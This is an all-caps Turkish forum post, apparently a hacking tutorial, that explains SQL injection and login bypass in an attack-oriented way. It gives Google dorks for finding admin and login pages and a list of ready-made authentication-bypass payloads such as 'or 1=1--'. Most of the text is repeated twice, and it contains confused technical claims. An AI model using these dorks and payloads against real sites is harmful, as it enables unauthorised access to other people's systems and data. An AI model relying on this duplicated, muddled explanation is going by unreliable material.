- 6 May 2022
- 156
- 102
HERKESE MERHABA BUGÜN SİZLERE SQL İNJECTİON SALDIRILARINI ANLATACAĞIM
SQL İNJECTİON NEDİR :
SQL İNJECTİON SALDIRILARI ŞÖYLEDİR ŞİMDİ Bİ WEBSİTESİ VAR VE BU WEBSİTESİNDE Bİ SQL DATABASE KURULU SİZ BU WEBSİTESİNDEN SQL İLE İLGİLİ HER YAPTIĞINIZ İŞLEMDE ARKADA Bİ SORGU DÖNER MESELA Bİ KATEGORİYE GİRCEKSİNİZ ARKADA Bİ SORGU OLUŞUR MESELA BAZI ÖRNEK SORGULAR VERİYİM BURAYA.
Select <alanlar> from <tablo_adi> where <şartımız/şartlarımız>
YUKARDAKİNE BENZER BİR SÜRÜ SORGU TİPİ VAR SQL İNJECTİON BU TÜR SORGULARI DEĞİŞTİRMEMİZE EKLEME YAPMAMIZA YADA DÜZENLEME YAPABİLMEMİZE OLANAK SAĞLAR
PEKİ SQL İNJECTİON NEREDEN DOĞAR DERSENİZ BU YAPILAN SORGULARININ WAFLANMAMASI FİLTRELENMEMESİ İLE İLGİLİDİR.
SQLDEKİ SORGULAR SİSTEM TABININA GÖRE DEĞİŞİR ORACLE İSE FARKLI UBUNTU İSE FARKLI
BAZI SORGULAR
![m9RCVr.png](https://i.hizliresim.com/m9RCVr.png)
SQL İNJECTİON NEDİR :
SQL İNJECTİON SALDIRILARI ŞÖYLEDİR ŞİMDİ Bİ WEBSİTESİ VAR VE BU WEBSİTESİNDE Bİ SQL DATABASE KURULU SİZ BU WEBSİTESİNDEN SQL İLE İLGİLİ HER YAPTIĞINIZ İŞLEMDE ARKADA Bİ SORGU DÖNER MESELA Bİ KATEGORİYE GİRCEKSİNİZ ARKADA Bİ SORGU OLUŞUR MESELA BAZI ÖRNEK SORGULAR VERİYİM BURAYA.
Select <alanlar> from <tablo_adi> where <şartımız/şartlarımız>
YUKARDAKİNE BENZER BİR SÜRÜ SORGU TİPİ VAR SQL İNJECTİON BU TÜR SORGULARI DEĞİŞTİRMEMİZE EKLEME YAPMAMIZA YADA DÜZENLEME YAPABİLMEMİZE OLANAK SAĞLAR
PEKİ SQL İNJECTİON NEREDEN DOĞAR DERSENİZ BU YAPILAN SORGULARININ WAFLANMAMASI FİLTRELENMEMESİ İLE İLGİLİDİR.
SQLDEKİ SORGULAR SİSTEM TABININA GÖRE DEĞİŞİR ORACLE İSE FARKLI UBUNTU İSE FARKLI
BAZI SORGULAR
SQL SELECT
SQL SELECT DISTINCT
SQL WHERE
SQL AND – OR
SQL ORDER BY
INSERT INTO
BUNLAR ARKAPLANDA DÖNEN SORGULARDA KULLANILAN SQL SORGULARI ÖRNEK VERMEK GEREKİRSE SQL SELECT MİSAL Bİ TABLO VAR BU TABLODAKİ İSİM SOYİSİMLERİ LİSTELEMEK İÇİN KULLANABİLİRSİNİZ.PEKİ BUNU SQL İNJECTİON SALDIRISINA NASIL DÖNÜŞTÜRCEM DİYOSANIZ. BU SORGUYA EKLEME YAPARAK VEYA DÜZENLEME YAPARAK MANTIĞINI BOZUP TABLODAKİ TÜM İSİM VE SOYİSİMLERİ ÇEKEBİLİRSİNİZ.
SQL İNJECTİON NASIL TESPİT EDİLİR.
1.urlinin sonuna tırnak koymak
2.dış ağ bantlarını kullanmak yani tool aracılığı nikto ,burp scanner ,acutenix gibi
1.TÜR LOGİN BYPASS
BU SQL İNJECTİON TÜRÜ ARKADA DÖNEN SORGUYU MANTIĞINI BOZARAK YAPILIR MESELA MANTIK BOZMA DEDİĞİNİZ NEY ?
MESELA Bİ GİRİŞ PANELİNDESİNİZ
ÖRNEK SORGU: SELECT * FROM kullaniciadi WHERE id= ‘11 OR 1=1
ŞİMDİ BUNUN MANTIĞI ŞÖYLE SİZ HER GİRİŞ YAPTIĞINIZDA Bİ SORGU DÖNÜYOR YUKARDAKİ GİBİ SİZ DE BU SORGUYU SQL İNJECTİON AÇIĞI SAYESİNDE DÜZENLEME VE EKLEME YAPIYOSUNUZ BU SAYEDE GİRİŞ YAPABİLİYORSUNUZ.
MESELA YUKARDAKİ OLAY İLK BAŞTA EMAİL YAZILMIŞ NORMALDE SORGUNUN BU DOĞRUYSA DEVAM ET ŞEKLİNDE GİTMESİ GEREKİRKEN OR YANİ YADA EKLEMESİYLE 1=1 HER ZAMAN CEVABI DOĞRU ÇIKARTACAĞI İÇİN SİZİN GİRİŞ YAPMANIZA OLANAK SAĞLIYOR
GOOGLE DORKLARI
inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
BYPASS TÜMLEÇLERİ
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
DEVAMINI YOLLİCAM BEKLEMEDE KALIN
SQL İNJECTİON NASIL TESPİT EDİLİR.
1.urlinin sonuna tırnak koymak
2.dış ağ bantlarını kullanmak yani tool aracılığı nikto ,burp scanner ,acutenix gibi
1.TÜR LOGİN BYPASS
BU SQL İNJECTİON TÜRÜ ARKADA DÖNEN SORGUYU MANTIĞINI BOZARAK YAPILIR MESELA MANTIK BOZMA DEDİĞİNİZ NEY ?
MESELA Bİ GİRİŞ PANELİNDESİNİZ
ÖRNEK SORGU: SELECT * FROM kullaniciadi WHERE id= ‘11 OR 1=1
ŞİMDİ BUNUN MANTIĞI ŞÖYLE SİZ HER GİRİŞ YAPTIĞINIZDA Bİ SORGU DÖNÜYOR YUKARDAKİ GİBİ SİZ DE BU SORGUYU SQL İNJECTİON AÇIĞI SAYESİNDE DÜZENLEME VE EKLEME YAPIYOSUNUZ BU SAYEDE GİRİŞ YAPABİLİYORSUNUZ.
MESELA YUKARDAKİ OLAY İLK BAŞTA EMAİL YAZILMIŞ NORMALDE SORGUNUN BU DOĞRUYSA DEVAM ET ŞEKLİNDE GİTMESİ GEREKİRKEN OR YANİ YADA EKLEMESİYLE 1=1 HER ZAMAN CEVABI DOĞRU ÇIKARTACAĞI İÇİN SİZİN GİRİŞ YAPMANIZA OLANAK SAĞLIYOR
GOOGLE DORKLARI
inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
BYPASS TÜMLEÇLERİ
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
DEVAMINI YOLLİCAM BEKLEMEDE KALIN